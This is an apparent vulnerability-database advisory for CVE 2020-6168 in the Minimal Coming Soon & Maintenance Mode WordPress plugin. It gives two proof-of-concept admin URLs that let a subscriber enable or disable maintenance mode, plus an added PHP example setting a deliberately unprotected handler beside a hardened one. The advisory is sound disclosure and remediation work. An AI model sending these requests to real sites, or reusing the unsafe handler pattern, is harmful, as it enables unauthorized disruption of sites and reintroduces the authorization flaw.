Minimal Coming Soon & Maintenance Mode < 2.15 - Insecure Permissions: Enable and Disable Maintenance Mode
Description
A flaw allowed any authenticated user with subscriber permissions or above to enable and disable maintenance mode on a vulnerable site by sending a single request.
Proof of Concept
Log in as a user with subscriber or above permissions and send the following request to enable maintenance mode:

/wp-admin/admin.php?action=csmm_change_status&new_status=enabled&redirect=/wp-admin/

Alternatively, send the following request to disable maintenance mode:

/wp-admin/admin.php?action=csmm_change_status&new_status=disabled&redirect=/wp-admin/
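
The following is an added example, not the plugin's own code, showing the pattern behind this class of bug: an admin-action handler that changes site state without verifying who is asking, beside a hardened version that requires a capability a subscriber does not have, a nonce, and a validated redirect target. The hook name, function names and option name are assumptions.

```php
<?php
// Added example (hypothetical; not taken from the plugin). Hook, function and
// option names are assumptions used for illustration only.

// Vulnerable pattern: admin_action_{action} fires for any logged-in user who can
// load /wp-admin/admin.php, and nothing here checks capability or intent.
function csmm_example_change_status_unsafe() {
    $new_status = isset( $_GET['new_status'] ) ? sanitize_key( $_GET['new_status'] ) : '';
    update_option( 'csmm_example_status', $new_status ); // hypothetical option name
    wp_safe_redirect( admin_url() );
    exit;
}

// Hardened pattern: require manage_options (subscribers lack it), require a nonce
// so the request must originate from a form or link the site rendered, validate
// the new value, and only follow same-site redirects.
function csmm_example_change_status_safe() {
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( esc_html__( 'You are not allowed to change maintenance mode.', 'csmm-example' ), 403 );
    }
    check_admin_referer( 'csmm_example_change_status' );

    $new_status = isset( $_GET['new_status'] ) ? sanitize_key( $_GET['new_status'] ) : '';
    if ( ! in_array( $new_status, array( 'enabled', 'disabled' ), true ) ) {
        wp_die( esc_html__( 'Invalid status.', 'csmm-example' ), 400 );
    }
    update_option( 'csmm_example_status', $new_status );

    // wp_validate_redirect() falls back to the default for off-site locations.
    $redirect = isset( $_GET['redirect'] )
        ? wp_validate_redirect( wp_unslash( $_GET['redirect'] ), admin_url() )
        : admin_url();
    wp_safe_redirect( $redirect );
    exit;
}
add_action( 'admin_action_csmm_example_change_status', 'csmm_example_change_status_safe' );

// The link that triggers the hardened handler must carry the matching nonce:
// wp_nonce_url(
//     admin_url( 'admin.php?action=csmm_example_change_status&new_status=enabled' ),
//     'csmm_example_change_status'
// );
```

Without the nonce a logged-in administrator could still be made to toggle the mode by following a crafted link, so the capability check alone is not sufficient for a state-changing GET handler.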

Affects Plugin

References

CVE 2020-6168
URL https://www.wordfence.com/blog/2020/01/multiple-vulnerabilities-patched-in-minimal-coming-soon-maintenance-mode-coming-soon-page-plugin/

Classification

Type BYPASS

Miscellaneous

Original Researcher Chloe Chamberland
Submitter Chloe Chamberland
Submitter Website wordfence.com
Submitter Twitter infosecchloe
Views 126192
Verified No
WPVDB ID 10008

Timeline

Publicly Published 2020-01-08
Added 2020-01-08
Last Updated 2020-01-09
